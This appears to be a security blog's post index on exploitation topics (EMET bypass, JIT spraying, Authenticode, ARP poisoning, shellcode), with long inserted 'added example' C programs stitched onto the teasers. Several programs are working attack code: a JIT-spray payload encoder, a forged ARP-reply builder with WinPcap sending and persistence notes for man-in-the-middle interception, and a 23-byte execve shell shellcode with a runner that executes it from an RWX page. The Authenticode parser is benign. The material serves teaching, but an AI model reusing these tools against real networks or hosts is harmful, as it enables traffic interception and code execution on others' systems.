Tweaking Metasploit Modules To Bypass EMET – Part 2

We continue our series on tweaking Metasploit modules to bypass EMET without changing Metasploit’s payloads. Last time, we talked about bypassing EMET’s Export Address Table Access Filtering (EAF) using SEH. Since that technique will not fit every exploit, we present a second technique that bypasses EAF without using SEH and, again, without changing Metasploit’s payload.
Continue reading

Tweaking Metasploit Modules To Bypass EMET – Part 1

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) is designed to harden a system against exploitation. It can render current Metasploit modules useless, as they are not designed to bypass it. We discuss ways to tweak Metasploit modules, in as generic a way as possible, so that they work against targets running EMET.
Continue reading

Hack-Me Shirts And Cool Gear!

We are proud to present a new, growing collection from IBadishi Digital Art (the sharpest of you might note the family relationship :) ). The collection features hack-me shirts (try to hack them!), ASCII art, geek chic, and simply cool gear. You can see some samples below. We would also love to hear what you think and what cool designs you would like to see, so feel free to leave your comments below.
Continue reading

Own And You Shall Be Owned

While working on Poison Ivy’s C&C communication, one of my students asked me whether the fact that an infected computer can connect to the C&C server means that the compromised host can break into the server. Well folks, it appears that it can. We present a fully working exploit for all Windows platforms (bypassing DEP and ASLR), allowing a computer infected by Poison Ivy (or any other computer, for that matter) to take control of PI’s C&C server.
Continue reading

JIT Spraying Primer and CVE-2010-3654

Lately, attackers have been forced to be more and more creative as defense mechanisms pile up and make exploitation harder. Most notably, data execution prevention (DEP) and address space layout randomization (ASLR), both present on Windows 7 and current browsers, make drive-by exploits a real pain. In this post we explain the concept of JIT spraying: abusing a Just-In-Time (JIT) compiler to emit attacker-chosen bytes into executable memory, which defeats DEP, and emitting so many copies that their address becomes guessable despite ASLR.
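The encoding trick behind a JIT spray, as an added example that is not code from the original post: a JIT that compiles a long chain of `x ^ 0x3C909090 ^ 0x3C909090 ^ ...` emits `mov eax, imm32` followed by repeated `xor eax, imm32`, and the attacker chooses the immediates. The functions below construct that byte stream for an arbitrary payload (the way the Flash ActionScript JIT emitted it in Blazakis's 2010 work, which is the JIT the referenced CVE concerns; the specific opcode layout is that of x86 and is not taken from the post), then walk it from offset +1 to confirm what the CPU would execute. The payload bytes are constructed filler.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the original post. It simulates the x86 a
 * JIT such as Flash's ActionScript JIT emitted for a long XOR chain of
 * immediate constants, and checks why executing that code one byte into the
 * first instruction yields attacker-chosen bytes. */

#define UNIT 5  /* size of "mov eax, imm32" (B8) and "xor eax, imm32" (35) */

/* For  var y = c0 ^ c1 ^ c2 ^ ...  the JIT emits B8 c0, 35 c1, 35 c2, ...
 * Each constant carries three payload bytes and then 0x3C. Executed from
 * offset 1 the stream reads: payload(3), then "3C 35" = cmp al, 0x35, which
 * harmlessly swallows the next opcode byte, then payload(3), and so on. */
size_t jit_emit_chain(const uint8_t *payload, size_t len, uint8_t *out, size_t cap)
{
    size_t terms = (len + 2) / 3;
    if (terms == 0 || terms * UNIT > cap) return 0;
    size_t o = 0;
    for (size_t t = 0; t < terms; t++) {
        out[o++] = (t == 0) ? 0xB8 : 0x35;           /* mov / xor opcode */
        for (size_t k = 0; k < 3; k++) {
            size_t i = t * 3 + k;
            out[o++] = (i < len) ? payload[i] : 0x90; /* pad with NOP */
        }
        out[o++] = 0x3C;                             /* cmp al, imm8 opcode */
    }
    return o;
}

/* Walk the emitted code the way the CPU does from offset 1 and collect the
 * bytes that actually execute as payload. Returns 0 if the "3C 35" glue is
 * missing anywhere, i.e. the misaligned stream would fall out of sync. */
size_t jit_recover_payload(const uint8_t *code, size_t len, uint8_t *out, size_t cap)
{
    size_t o = 0;
    for (size_t p = 1; p + 3 <= len; p += UNIT) {
        if (o + 3 > cap) return 0;
        memcpy(out + o, code + p, 3);
        o += 3;
        if (p + 4 >= len) break;                     /* last term: no 35 follows */
        if (code[p + 3] != 0x3C || code[p + 4] != 0x35) return 0;
    }
    return o;
}

/* Constructed 7-byte payload: two full 3-byte groups plus a partial one. */
int jit_selftest(void)
{
    static const uint8_t pl[7] = {0x31, 0xC0, 0x50, 0x68, 0x2F, 0x2F, 0x73};
    uint8_t code[64], rec[64];
    size_t n = jit_emit_chain(pl, sizeof pl, code, sizeof code);
    if (n != 15) return -1;                          /* 3 terms * 5 bytes */
    if (code[0] != 0xB8 || code[4] != 0x3C || code[5] != 0x35 || code[14] != 0x3C) return -2;
    size_t r = jit_recover_payload(code, n, rec, sizeof rec);
    if (r != 9) return -3;                           /* 7 bytes + 2 NOP pad */
    if (memcmp(rec, pl, 7) != 0 || rec[7] != 0x90 || rec[8] != 0x90) return -4;
    return (int)n;
}

int main(void)
{
    static const uint8_t pl[7] = {0x31, 0xC0, 0x50, 0x68, 0x2F, 0x2F, 0x73};
    uint8_t code[64], rec[64];
    size_t n = jit_emit_chain(pl, sizeof pl, code, sizeof code);
    size_t r = jit_recover_payload(code, n, rec, sizeof rec);
    printf("JIT output      :"); for (size_t i = 0; i < n; i++) printf(" %02X", code[i]); puts("");
    printf("executed from +1:"); for (size_t i = 0; i < r; i++) printf(" %02X", rec[i]); puts("");
    return jit_selftest() == 15 ? 0 : 1;
}
```

Two caveats the simulation makes visible: every 3-byte group must end on an instruction boundary, because `cmp al, 0x35` is inserted between groups, and the last group's `3C` consumes whatever byte the JIT emits next as its operand, so a real payload ends with a short jump into the actual stage rather than running off the end of the chain.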
Continue reading

Windows Authenticode, PKCS #7 and X.509 Certificates

Every second Tuesday of the month, Microsoft releases a batch of security (and other) updates for its products; this is known as Patch Tuesday. Microsoft’s security updates for April 2012 contain several patches, one of which is described in security bulletin MS12-024. The bulletin talks about remote code execution through specially crafted, digitally signed portable executable (PE) files; the vulnerability is rated critical. To understand what this is all about, we first look at what a digitally signed PE (using Windows Authenticode) looks like.
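Where the Authenticode signature sits inside a PE, as an added example that is not code from the original post: the parser below follows `e_lfanew` to the PE header, reads the optional header magic to find the data directories, and takes entry 4 (the Certificate Table), whose "VirtualAddress" is a raw file offset to a `WIN_CERTIFICATE` header wrapping the PKCS #7 `SignedData`. The sample image it parses is a constructed stub with only those fields filled in, not a real signed binary; every read is bounds-checked, since the input is attacker-controlled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the original post: locate the Authenticode
 * blob in a PE image. Certificate Table = data directory 4; its offset is a
 * file offset (not an RVA) to WIN_CERTIFICATE { dwLength, wRevision,
 * wCertificateType, bCertificate[] } where bCertificate is PKCS #7 DER. */

struct authenticode_blob {
    uint32_t file_offset;   /* offset of WIN_CERTIFICATE in the file */
    uint32_t length;        /* dwLength: header + DER, 8-byte aligned in practice */
    uint16_t revision;      /* 0x0200 = WIN_CERT_REVISION_2_0 */
    uint16_t cert_type;     /* 0x0002 = WIN_CERT_TYPE_PKCS_SIGNED_DATA */
    const uint8_t *pkcs7;   /* start of the PKCS #7 SignedData */
    uint32_t pkcs7_len;
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* 0 on success; negative codes for each way a hostile file can be malformed. */
int find_authenticode(const uint8_t *pe, size_t len, struct authenticode_blob *out)
{
    if (len < 0x40 || pe[0] != 'M' || pe[1] != 'Z') return -1;
    uint32_t nt = rd32(pe + 0x3C);                          /* e_lfanew */
    if (nt > len - 4 || memcmp(pe + nt, "PE\0\0", 4) != 0) return -2;
    size_t opt = nt + 4 + 20;                               /* past IMAGE_FILE_HEADER */
    if (opt + 2 > len) return -2;
    uint16_t magic = rd16(pe + opt);
    size_t dirs;                                            /* first data directory */
    if (magic == 0x10B) dirs = opt + 96;                    /* PE32 */
    else if (magic == 0x20B) dirs = opt + 112;              /* PE32+ */
    else return -3;
    size_t sec = dirs + 4 * 8;                              /* IMAGE_DIRECTORY_ENTRY_SECURITY */
    if (sec + 8 > len) return -2;
    uint32_t off = rd32(pe + sec), size = rd32(pe + sec + 4);
    if (off == 0 || size == 0) return -4;                   /* image is not signed */
    if (size < 8 || off > len || size > len - off) return -5;
    uint32_t dwlen = rd32(pe + off);
    if (dwlen < 8 || dwlen > size) return -5;
    out->file_offset = off;
    out->length = dwlen;
    out->revision = rd16(pe + off + 4);
    out->cert_type = rd16(pe + off + 6);
    out->pkcs7 = pe + off + 8;
    out->pkcs7_len = dwlen - 8;
    if (out->revision != 0x0200 || out->cert_type != 0x0002) return -6;
    return 0;
}

/* Constructed sample: a fake PE32 with a certificate table at 0x200 (not a
 * real signed file; the DER is just a SEQUENCE tag). Returns bytes written. */
size_t build_sample_pe(uint8_t *buf, size_t cap)
{
    if (cap < 0x220) return 0;
    memset(buf, 0, 0x220);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3C, 0x80);                 /* e_lfanew */
    memcpy(buf + 0x80, "PE\0\0", 4);
    wr16(buf + 0x98, 0x10B);                /* optional header magic: PE32 */
    wr32(buf + 0x118, 0x200);               /* security dir: file offset */
    wr32(buf + 0x11C, 0x20);                /* security dir: size */
    wr32(buf + 0x200, 0x20);                /* WIN_CERTIFICATE.dwLength */
    wr16(buf + 0x204, 0x0200);              /* wRevision */
    wr16(buf + 0x206, 0x0002);              /* wCertificateType = PKCS_SIGNED_DATA */
    buf[0x208] = 0x30; buf[0x209] = 0x82;   /* where the real DER SEQUENCE would start */
    return 0x220;
}

/* Returns the PKCS #7 length found in the sample (24), or a negative code. */
int authenticode_selftest(void)
{
    uint8_t pe[0x220];
    struct authenticode_blob b;
    if (build_sample_pe(pe, sizeof pe) == 0) return -100;
    int rc = find_authenticode(pe, sizeof pe, &b);
    if (rc != 0) return rc;
    if (b.file_offset != 0x200 || b.length != 0x20 || b.pkcs7[0] != 0x30) return -101;
    wr32(pe + 0x118, 0);                    /* clear the directory: now "unsigned" */
    if (find_authenticode(pe, sizeof pe, &b) != -4) return -102;
    return (int)b.pkcs7_len;
}

int main(void)
{
    uint8_t pe[0x220];
    struct authenticode_blob b;
    build_sample_pe(pe, sizeof pe);
    int rc = find_authenticode(pe, sizeof pe, &b);
    printf("rc=%d offset=0x%X len=%u rev=0x%04X type=0x%04X pkcs7=%u bytes\n",
           rc, b.file_offset, b.length, b.revision, b.cert_type, b.pkcs7_len);
    return rc == 0 ? 0 : 1;
}
```

A point worth keeping in mind when reading the bulletin: the Authenticode hash deliberately excludes the `CheckSum` field, the security data directory entry and the certificate table itself, so any bytes inside that table which the PKCS #7 structure does not account for are not protected by the signature, and a verifier has to decide what to do with them.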
Continue reading

ARP-Poisoning With WinPcap

ARP poisoning is an attack that lets an attacker become a man-in-the-middle (MITM) on a local network, making all traffic between two or more hosts pass through the attacker. It works because ARP has no authentication: hosts update their cache from any reply they receive, solicited or not. A MITM attacker can therefore see all the traffic between the victims, manipulate it, or drop it altogether. We now discuss how to perform the most basic ARP-poisoning attack using WinPcap.
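The frame at the heart of the attack, as an added example that is not code from the original post: an unsolicited ARP reply telling the victim that the gateway's IP is at the attacker's MAC, plus the mirror frame for the gateway so that both directions flow through the attacker. The code only builds the raw Ethernet frame; under WinPcap that buffer is what `pcap_sendpacket()` takes after `pcap_open_live()` on the chosen adapter (both are real WinPcap calls, shown in a comment so the example compiles without the library). All addresses are made up.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the original post: build the forged ARP reply
 * that poisons a victim's ARP cache. The result is a 42-byte raw Ethernet
 * frame, exactly what WinPcap's pcap_sendpacket() expects. */

#define ETH_HDR   14
#define ARP_LEN   28
#define FRAME_LEN (ETH_HDR + ARP_LEN)

struct arp_target {
    uint8_t victim_mac[6];   /* host whose cache we poison */
    uint8_t victim_ip[4];
    uint8_t spoofed_ip[4];   /* IP we claim to own, e.g. the default gateway */
    uint8_t attacker_mac[6]; /* MAC the victim will now send to */
};

/* Unsolicited reply "spoofed_ip is-at attacker_mac", unicast to the victim.
 * Returns bytes written (42) or 0 if the buffer is too small. */
size_t build_arp_reply(const struct arp_target *t, uint8_t *frame, size_t cap)
{
    if (cap < FRAME_LEN) return 0;
    uint8_t *p = frame;
    memcpy(p, t->victim_mac, 6);   p += 6;   /* Ethernet destination */
    memcpy(p, t->attacker_mac, 6); p += 6;   /* Ethernet source */
    *p++ = 0x08; *p++ = 0x06;                /* EtherType: ARP */
    *p++ = 0x00; *p++ = 0x01;                /* HTYPE: Ethernet */
    *p++ = 0x08; *p++ = 0x00;                /* PTYPE: IPv4 */
    *p++ = 6;    *p++ = 4;                   /* HLEN, PLEN */
    *p++ = 0x00; *p++ = 0x02;                /* OPER: reply */
    memcpy(p, t->attacker_mac, 6); p += 6;   /* sender MAC: the lie */
    memcpy(p, t->spoofed_ip, 4);   p += 4;   /* sender IP: the gateway */
    memcpy(p, t->victim_mac, 6);   p += 6;   /* target MAC */
    memcpy(p, t->victim_ip, 4);    p += 4;   /* target IP */
    return (size_t)(p - frame);
}

/* Mirror frame for the gateway: "victim_ip is-at attacker_mac". Without it
 * only one direction is intercepted. */
size_t build_mirror_reply(const struct arp_target *t, const uint8_t gateway_mac[6],
                          uint8_t *frame, size_t cap)
{
    struct arp_target m;
    memcpy(m.victim_mac, gateway_mac, 6);
    memcpy(m.victim_ip, t->spoofed_ip, 4);
    memcpy(m.spoofed_ip, t->victim_ip, 4);
    memcpy(m.attacker_mac, t->attacker_mac, 6);
    return build_arp_reply(&m, frame, cap);
}

/* Minimal decoder: is this an ARP reply? (A detector would additionally flag
 * replies nobody requested and IP-to-MAC mappings that change.) */
int arp_is_reply(const uint8_t *frame, size_t len)
{
    return len >= FRAME_LEN && frame[12] == 0x08 && frame[13] == 0x06
        && frame[20] == 0x00 && frame[21] == 0x02;
}

/* Constructed addresses; returns 42 when both frames check out. */
int arp_selftest(void)
{
    struct arp_target t = {
        {0x00, 0x0c, 0x29, 0xaa, 0xbb, 0xcc}, {192, 168, 1, 10},  /* victim */
        {192, 168, 1, 1},                                          /* gateway IP */
        {0xde, 0xad, 0xbe, 0xef, 0x00, 0x01}                       /* attacker NIC */
    };
    const uint8_t gw_mac[6] = {0x00, 0x50, 0x56, 0x11, 0x22, 0x33};
    uint8_t f1[64], f2[64];
    size_t n1 = build_arp_reply(&t, f1, sizeof f1);
    size_t n2 = build_mirror_reply(&t, gw_mac, f2, sizeof f2);
    if (n1 != FRAME_LEN || n2 != FRAME_LEN) return -1;
    if (!arp_is_reply(f1, n1) || !arp_is_reply(f2, n2)) return -2;
    if (memcmp(f1, t.victim_mac, 6) || memcmp(f1 + 22, t.attacker_mac, 6)
        || memcmp(f1 + 28, t.spoofed_ip, 4)) return -3;           /* victim learns gw->attacker */
    if (memcmp(f2, gw_mac, 6) || memcmp(f2 + 28, t.victim_ip, 4)) return -4; /* gw learns victim->attacker */
    return (int)n1;
}

int main(void)
{
    /* With WinPcap:
     *   char err[PCAP_ERRBUF_SIZE];
     *   pcap_t *h = pcap_open_live(adapter_name, 65536, 1, 1000, err);
     *   pcap_sendpacket(h, frame, (int)n);     // repeat every second or two
     * The resend is needed because the real gateway's ARP traffic and cache
     * timeouts keep correcting the victim's entry. */
    return arp_selftest() == FRAME_LEN ? 0 : 1;
}
```

Two practical notes: the attacker's host must forward the intercepted packets (or the victim simply loses connectivity, which is noticed quickly), and the poisoning frames have to be resent periodically because the genuine gateway keeps restoring the correct mapping.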
Continue reading

Basic Shellcode Example

As explained before, exploiting a vulnerability involves triggering the vulnerability and then, typically, executing your own code on the machine. The code your exploit runs can do many things, but originally it just opened a shell, hence the term shellcode. We now detail the basic steps involved in creating the shellcode itself (not the whole exploit).
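A minimal shellcode and the checks that go with it, as an added example that is not code from the original post. The post does not state its target platform; this example assumes Linux x86-64 (an assumption) and uses the well-known 23-byte `execve("/bin//sh")` sequence. It scans the bytes for characters the delivery path cannot carry (a `strcpy()` overflow dies at the first `0x00`) and, only when explicitly asked, copies the bytes into an executable page and jumps to them.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#if defined(__linux__) && defined(__x86_64__)
#include <sys/mman.h>
#endif

/* Added example, not the original post's code. Platform (Linux x86-64) is an
 * assumption; the shellcode below is the classic 23-byte execve("/bin//sh"). */

/* xor rsi,rsi ; push rsi          ; envp = NULL, and the 0 that terminates argv
 * mov rdi,"/bin//sh" ; push rdi   ; 8-byte string, doubled slash avoids a NUL
 * push rsp ; pop rdi              ; rdi = pointer to the string on the stack
 * push 0x3b ; pop rax             ; rax = SYS_execve without a NUL in the encoding
 * cdq ; syscall                   ; rdx = 0 (rax is positive), argv stays NULL */
static const uint8_t shellcode[] = {
    0x48, 0x31, 0xf6, 0x56,
    0x48, 0xbf, '/', 'b', 'i', 'n', '/', '/', 's', 'h',
    0x57, 0x54, 0x5f,
    0x6a, 0x3b, 0x58, 0x99, 0x0f, 0x05
};

size_t shellcode_len(void) { return sizeof shellcode; }

/* Index of the first byte of code[] that appears in bad[], or -1 if none.
 * Which bytes are "bad" depends on how the exploit delivers the payload:
 * 0x00 for C string copies; 0x0a/0x0d for line-based protocols; '%', '&',
 * ' ' and friends for URL or form parameters. */
long first_bad_char(const uint8_t *code, size_t len, const uint8_t *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (code[i] == bad[j]) return (long)i;
    return -1;
}

/* Test harness: map an RWX page, copy the bytes in, call them. On success
 * execve replaces this process with a shell and this never returns. */
int run_shellcode(const uint8_t *code, size_t len)
{
#if defined(__linux__) && defined(__x86_64__)
    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return -1;
    memcpy(page, code, len);
    ((void (*)(void))page)();
    return -2;                      /* reached only if the syscall failed */
#else
    (void)code; (void)len;
    return -3;                      /* this shellcode is x86-64 Linux only */
#endif
}

int main(int argc, char **argv)
{
    static const uint8_t nul_and_newlines[] = {0x00, 0x0a, 0x0d};
    printf("%zu bytes:", shellcode_len());
    for (size_t i = 0; i < sizeof shellcode; i++) printf(" %02x", shellcode[i]);
    printf("\nfirst bad char (NUL/LF/CR): %ld\n",
           first_bad_char(shellcode, sizeof shellcode, nul_and_newlines, 3));
    if (argc > 1 && strcmp(argv[1], "run") == 0)   /* only execute on request */
        return run_shellcode(shellcode, sizeof shellcode);
    return 0;
}
```

Run without arguments to see the hex dump and the bad-character check; `./a.out run` executes the bytes and should drop you into a shell. If the exploit's delivery path forbids other bytes (slashes in a path, for instance), `first_bad_char()` reports the offending offset, and that is the byte to re-encode before moving on to the exploit proper.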
Continue reading